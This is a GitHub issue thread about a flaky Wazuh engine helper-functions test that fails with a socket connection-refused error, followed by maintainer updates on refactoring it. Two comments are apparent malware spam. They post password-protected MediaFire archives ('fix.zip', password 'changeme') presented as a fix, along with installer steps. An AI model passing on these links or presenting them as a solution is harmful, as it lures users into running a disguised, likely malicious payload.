### ISSUE TITLE
Engine - Error in Helper Functions Test

### ISSUE THREAD

**Issue by JcabreraC** [wazuh/wazuh#25438]
### Description

We're experiencing a flaky test in the "Engine Helper Functions Test." The test intermittently fails with the following error:
```vbnet
Error parsing response: Error while connecting to API socket/tmp/actions/queue/sockets/engine-api: [Errno 111] Connection refused
Error: The operation was canceled.
```
The test seems to be trying to run a command involving engine-helper functions:

```css
Run engine-helper-test-generate-runner -e /tmp/actions -b /home/runner/work/wazuh/wazuh/src/engine/build/main -i /home/runner/work/wazuh/wazuh/src/engine/test/helper_tests/helpers_description/ -o /tmp/output/
```
This error indicates that there may be an issue with establishing a connection to the API socket during the test run. This behavior is inconsistent, which is why it is classified as flaky.

### Steps to Reproduce
1. Run the "Engine Helper Functions Test" in the CI pipeline.
2. Observe intermittent failures with the above error message.

### Expected Behavior
The test should run consistently without connection issues or cancellation errors.

### Actual Behavior
The test sometimes fails with the following error:
```vbnet
Error while connecting to API socket/tmp/actions/queue/sockets/engine-api: [Errno 111] Connection refused
Error: The operation was canceled.
```
### Impact

This is causing the CI pipeline to fail intermittently, which affects overall development velocity and reliability.

### Proposed Investigation
- Investigate the root cause of the connection failure to the engine API socket.
- Verify the configuration and ensure proper socket creation and communication.
- Check if there are race conditions or delays in setting up the API socket that could lead to the failure.
- Explore potential solutions like retries, better error handling, or changes in timing/configuration.

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JavierBejMen** [comment]
## Update
After failing to reproduce the error I'm going to refactor the test for better error handling and communication.

**Comment by JavierBejMen** [comment]
## Update
- Refactored initial state cmd
- Refactored validate cmd
- Refactored generate cmd

**Comment by JavierBejMen** [comment]
## Update
- Refactored run
- Refactored generate-doc
- QoL on error handling and output
- Updated README

**Comment by JcabreraC** [comment]
ETA extended by final revision of #25298. This issue must be merged before the current issue.

**Comment by juliancnn** [comment]
All test fail in local, maybe is related to Engine to **Management of IANA database due to external update issues [#25666](https://github.com/wazuh/wazuh/issues/25666)**

**Comment by juliancnn** [comment]
All test fail in local, I will check it again tomorrow with @JavierBejMen, since in the workflows they pass.

**Comment by JavierBejMen** [comment]
> All test fail in local, I will check it again tomorrow with @JavierBejMen, since in the workflows they pass.

All good now
